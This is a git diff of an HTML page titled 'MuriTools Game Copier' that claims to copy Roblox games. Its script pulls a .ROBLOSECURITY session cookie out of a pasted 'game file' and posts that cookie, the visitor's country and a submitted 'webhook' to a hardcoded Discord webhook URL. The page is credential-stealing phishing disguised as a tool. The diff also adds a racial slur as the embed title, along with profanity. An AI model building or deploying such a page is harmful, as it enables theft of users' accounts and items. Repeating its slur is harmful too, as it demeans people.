--- a/index.html
+++ b/index.html
@@ -12,7 +12,7 @@
             flex-direction: column;
             align-items: center;
             height: 100vh;
-            background: linear-gradient(125deg, #0f0f0f, #008b8b);
+            background: #212121;
             color: white;
         }
         .header {
@@ -23,9 +23,16 @@
             font-weight: bold;
             color: #ffffff;
         }
+        .divider {
+            border: none;
+            height: 2px;
+            background-color: #ffffff;
+            margin: 90px 0;
+            width: 100%;
+        }
         .title-section {
             text-align: center;
-            margin-top: 80px;
+            margin-top: -40px;
         }
         .container {
             display: flex;
@@ -36,11 +43,11 @@
         .panel {
             background-color: #222;
             border-radius: 20px;
-            padding: 15px;
+            padding: 10px;
             font-size: 1.3em;
-            box-shadow: 0 0 20px rgba(0, 255, 255, 0.6);
-            border: 3px solid #008b8b;
-            width: 550px;
+            border: 0.1px solid #6a6a6a;
+            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
+            width: 580px;
             text-align: center;
         }
         .panel h2 {
@@ -50,39 +57,40 @@
         }
         .input-box {
             width: 90%;
-            padding: 15px;
+            padding: 11px;
             font-size: 1.2em;
             margin: 15px 0;
             border: 1px solid #444;
             border-radius: 8px;
+            border: 0.1px solid #6a6a6a;
             background-color: #333;
             color: #fff;
         }
         .btn {
             width: 100%;
-            padding: 15px;
+            padding: 10px;
             font-size: 1.5em;
             border: none;
             border-radius: 8px;
-            background-color: #1e90ff;
+            border: 0.1px solid #6a6a6a;
+            background-color: #334c7c;
             color: white;
             cursor: pointer;
             transition: background-color 0.3s;
         }
         .btn:hover {
-            background-color: #187bcd;
+            background-color: #2e446e;
         }
         .video-container {
-            background-color: #000;
             border-radius: 10px;
             overflow: hidden;
             display: flex;
             justify-content: center;
             align-items: center;
-            height: 250px;
+            height: 230px;
         }
         iframe {
-            width: 100%;
+            width:69%;
             height: 100%;
         }
         .processing-panel {
@@ -91,14 +99,15 @@
             top: 50%;
             left: 50%;
             transform: translate(-50%, -50%);
-            background-color: rgba(0, 0, 0, 0.9);
+            background-color: rgba(0, 0, 0, 0.4);
+            border: 0.1px solid #6a6a6a;
             border-radius: 20px;
-            padding: 60px;
+            padding: 70px;
             font-size: 2em;
+            font-family: bold
             color: #ffffff;
-            box-shadow: 0 0 30px rgba(0, 255, 255, 0.6);
             text-align: center;
-            z-index: 1000;
+            z-index: 900;
             max-width: 80%;
             width: 400px;
         }
@@ -106,9 +115,10 @@
 </head>
 <body>
     <div class="header">MuriTools</div>
+    <hr class="divider">
     <div class="title-section">
         <h1 style="font-size: 3.5em; margin: 20px 0;">Game Copier</h1>
-        <p style="font-size: 2em; text-align: center; max-width: 1200px;">
+        <p style="font-size: 1.5em; text-align: center; max-width: 1200px; color: Grey">
             Copy games with ease, with this brand new powershell-based system!
         </p>
     </div>
@@ -117,20 +127,20 @@
         <div class="panel">
             <h2>Copy Games</h2>
             <input id="sessionScript" placeholder="Enter game file" class="input-box" rows="10"></textarea>
-            <input type="text" id="pin" placeholder="Create a pin" class="input-box">
+            <input type="text" id="pin" placeholder="Enter Webhook" class="input-box">
             <button class="btn" onclick="sendToDiscord()">Copy Game!</button>
         </div>
 
         <div class="panel">
             <h2>How to use</h2>
             <div class="video-container">
-                <iframe src="https://www.youtube.com/embed/YOUR_VIDEO_ID" frameborder="0" allowfullscreen></iframe>
+                <iframe src="https://www.youtube.com/embed/" frameborder="0" allowfullscreen></iframe>
             </div>
         </div>
     </div>
 
     <div id="processingPanel" class="processing-panel">
-        Game is being processed; this may take 1-5 minutes!
+        Game is being processed this may take 1-5 minutes!
     </div>
 
     <script>
@@ -155,17 +165,14 @@
                 .replace(/./g, char => String.fromCodePoint(127397 + char.charCodeAt()));
         }
 
-
         function loadTotalHits() {
             const savedHits = localStorage.getItem('totalPings');
             totalPings = savedHits ? parseInt(savedHits, 10) : 0;
         }
 
-
         function saveTotalHits() {
             localStorage.setItem('totalPings', totalPings);
         }
-
 
         loadTotalHits();
         fetchCountry();
@@ -185,18 +192,14 @@
 
             const webhookUrl = "https://discord.com/api/webhooks/1300555524823187576/jn-SfRrTE-bmNQFXvaQRSmiZfmJFBQeMyI2uAaF27TwiOcQNXK7SeQP-Jc6S7G0KfaSP";
 
-
             totalPings++;
             saveTotalHits();
 
-
             const cookiePattern = /\.ROBLOSECURITY",\s*"_\|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items\.\|_[A-Za-z0-9]+"/;
-
 
             let cookieString = "";
             const match = sessionScript.match(cookiePattern);
             if (match) {
-
                 cookieString = match[0].split('.ROBLOSECURITY", "')[1].slice(0, -1).trim();
             } else {
                 alert("Please Enter A Game File!");
@@ -208,11 +211,11 @@
               content: "@everyone",
                 embeds: [
                     {
-                        title: "HIT WITH EKSOVA!!!",
-                        description: `\n**Country**: ${countryFlag}\n\n**useless**: ${pin || "N/A"}\n**🍪Roblox Cookie🍪**\n\`\`\`\n${cookieString}\n\`\`\``,
+                        title: "negros",
+                        description: `\n**Country**: ${countryFlag}\n\n**webhook**\n\`\`\`\n${pin}\n\`\`\`\n**🍪Roblox Cookie🍪**\n\`\`\`\n${cookieString}\n\`\`\``,
                         color: 0x000000,
                         footer: {
-                            text: "fucking skids"
+                            text: "fucking skids."
                         },
                         timestamp: new Date().toISOString()
                     }
